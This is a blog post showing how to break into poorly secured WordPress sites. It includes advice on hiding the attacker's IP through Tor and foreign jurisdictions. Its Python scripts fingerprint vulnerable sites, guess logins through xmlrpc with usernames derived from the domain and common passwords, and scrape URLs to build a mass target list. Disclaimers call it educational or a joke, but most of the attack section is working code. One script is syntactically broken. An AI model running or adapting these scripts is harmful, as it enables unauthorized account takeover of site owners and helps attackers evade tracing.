Attacking WordPress sites run by Information poor

  • 19 December 2021
Post image

Somehow, being bad can be fascinating.
Probably anyone who was born between the 1970s and early 1990s and touched a PC during their school days has been exposed to the underground world once or twice, right? Especially erotic ones. When I was young, I also tried to open ports of communication protocols that I didn’t even know the meaning of, or tried to apply someone’s hexadecimal code to existing software, in order to secure some kind of print material. These underground activities enhanced my computer knowledge. As the story goes, even in 2021, the majority of websites in the world are made with WordPress (wp). And I know that many of those sites do not have any security measures in place. So, let me show you how to hack (crack) a WP site. Please note that this information is intended to improve the understanding of security through hacking and to promote countermeasures, so please do not misuse it. As mentioned below, it can be easily traced in some cases. Also, please consider the means of this attack as a gag. Refer to this article for minimum security measures.


First, cover up and disguise the source.

If you make several attacks against the WP site you are attacking, you will naturally leave information about the source of the access on the other party’s server. This means that if you carry out an attack from your own home or office, the victim can take legal action and identify you from the IP address from which you accessed the site. This also means that if you do it from an Internet cafe or public wifi spot, the police will easily be able to identify you from surveillance cameras and other information.
Therefore, in order to disguise the source IP, there are ways to access the target server via stepping stone proxy servers around the world. One famous example is the tor proxy. This means that it is possible to cover up the source of the attack because it goes through many stepping-stone servers around the world, which means that it is very costly to trace the source and difficult to identify. This is something to be aware of, but tor can be traced if you want to. I’m not going to write about the implementation details of tor. I’m not going to go into the details of tor’s implementation, but it is possible to cover it up by going through countries that are outside the jurisdiction of the West.


Select targets for attack

It is necessary to check whether this attack method is effective for the target WP site or not. The following script is a simple way to check if the target site is suitable for the attack.

import requests
ua = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36"

def get_request(url):
  return requests.get(url, headers={'User-Agent': ua}, timeout=10)
def post_request(url):
  return requests.post(url, headers={'User-Agent': ua}, timeout=10)

def is_wp(url):
  res = get_request(f'{url}/wp-login.php')
  if res.status_code < 400: return True
  res = get_request(f'{url}')
  if "wp-content" in res.text: return True
  return False

def is_secured(url):
  res = get_request(f'{url}/wp-login.php')
  if res.status_code >= 400: return True
  res = post_request(f'{url}/xmlrpc.php')
  if res.status_code >= 400: return True
  return False

def main(url):
  if is_wp(url) is False:
    print("This is not a WP site.")
    return
  if is_secured(url) is False:
    print("This site is attackable.")
  else:
    print("Unable to attack")


if __name__ == "__main__":
    url = "Here is the top URL of the attack site"
    main(url)

# >> This site is attackable.

No basic authentication, xmlrpc enabled, etc., which means that the site is a WP site with no minimum security measures. The administrators of such sites may not be security literate and may have set up usernames, passwords, etc. that can be easily guessed.


Breaking through the WP login

You may be able to get the username and password with a script like the following. Of course, it is unlikely to succeed, but as mentioned above, if the site does not have general security measures in place, there is a reasonable chance of breaking through.
By the way, xmlrpc can do 1000 or 10000 login attempts with no weight. It can also be run asynchronously, so it can be done at intervals that do not cause the attacked server to go down. I will not introduce how to create “commonly used passwords” or “commonly used combinations”. You can find them by Googling. Also, brute force is not considered in this article.

from wordpress_xmlrpc import Client, WordPressPost
from wordpress_xmlrpc.methods.users import GetUserInfo

def get_predict_usernames(url):
  '''
  The username is most likely the name of the site, i.e. the domain minus the top level.
  Also, provide some patterns for subdomains, hyphens, and underscores.
  '''
  ret = []
  domain = "".join(url.split("/")[2].split(".")[:-1])
  if domain == "": return ret
  ret.append(domain)
  ret.append(domain.replace(".", ""))
  ret.append(domain.replace("_", ""))
  ret.append(domain.replace("-", ""))
  ret.append(domain.replace("_", "").replace("-", ""))
  ret.append(domain.split(".")[-1])
  return ret

def get_predict_password(username): 
  '''
  1. Sites with lax security are more likely to have "commonly used passwords.
  2. Most likely the same as username.
  3. For corporate sites, there are some common password combinations such as username followed by a number such as the month and day of establishment.
  '''
  ret = []
  ret.extend(["All strings in the ranking used in the password."])
  ret.append(username)
  ret.extend(["Automatically scrapes and adds combinations of information such as the month and date of establishment."])
  return ret

def main(url):
  for username in get_predict_usernames(url):
    for password in get_predict_password(username):
      try:
        wp = Client(f'{url}/xmlrpc.php', username, password)
        res = wp.call(GetUserInfo())
        print("Successful login password hack")
        print(f'username: {username}')
        print(f'password: {password}')
        exit()
      except Exception as e:
        print(e)

if __name__ == "__main__":
    url = "Top URL of the site under attack"
    main(url)

# >> Successful login password hack
# >> username: xxxxxxx
# >> password: xxxxxxx

Collect a large number of URLs of WP sites with lax security.

The above methods are unlikely to break through the login authentication, right? However, if you have 10,000 target sites, there is a possibility that you can break through any of them. For example, if you scrape a lot of company URLs from job sites, or get a list of site URLs from blog ranking sites, you can easily gather 10,000 sites.
So, you can also use the following scraping script and the “screen attack targets” script to get a list of URLs of vulnerable WP sites. (This is a joke. Don’t ever do this. Make sure the code is non-recursive just in case.)

import bs4
import requests
from urllib.parse import urlparse
ua = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36"

def get_request(url):
  return requests.get(url, headers={'User-Agent': ua}, timeout=10)

def main(url):
  soup = bs4.BeautifulSoup(response.text, 'html.parser')
  # In this example, only the URLs in one page are scraped.
  site_urls = []
  for a in soup.find_all('a'):
    if a.get('href') is not None: site_urls.append(a['href'])

  ex_site_url = []
  # Extract only external site URLs and set the top page URL.
  for href in site_urls:
    parsed_url = urlparse(href)
    if parsed_url.netloc not in href:
      ex_site_url.append(f'{parsed_url.scheme}://{parsed_url.netloc}')
  
  # Narrow down the attack targets with the "Select attack targets" script (omitted).
  
  # In the meantime, write the URL to a file
  d = "\n".join(ex_site_url。。
  with open('wp_site_url.txt', 'w') as f:
    f.write(d)

if __name__ == "__main__":
  url = "URL of the scraping destination"
  main(url)

This script is also simple, but if you get the sitemap of a site that links a lot of URLs to WP and put it on all pages, you can get the URLs at once. Oh, don’t actually do this. If the server of the scrape destination goes down, the person who did it will be responsible.
And if you run the above login password hack script sequentially against a large number of WP site URLs, you might catch a few sites. Once you’ve hacked them, you can then log into WP and do whatever you want. It’s scary.


NO, ABSOLUTELY NOT!

There are other pinback DDos attacks, but these are a bit more annoying, so I’ll leave them for another article. The above method is a simple way to estimate the user name and password, so the probability is low. There are more effective estimation methods. Also, if you want to concentrate your attack on a single site, you can gather information on the administrator of that site and try some brute force attacks.
On the WP sites I’ve seen, there was a fairly high probability that the username was either the site name, domain name, or company name. It is also possible to guess the email address that can be used as the username if it is a corporate site. I also noticed that many of the passwords were not the complex passwords that WP provides by default, but rather strings of characters that were easy to remember and did not contain * symbols or capital letters. Unfortunately, these are not that difficult to guess and can be used to break through authentication.

Well, let’s get this straight: if you do any of these things, you’re going to be in trouble. At least if you run it against a sample site on your own home server, it won’t bother anyone, but if you run it against a public server, even if it’s your own site, you shouldn’t do it. (Even if it’s your own site, don’t run it against a public server.)
The important thing is to take measures to prevent this from happening, check out WP’s security measures.

You May Also Like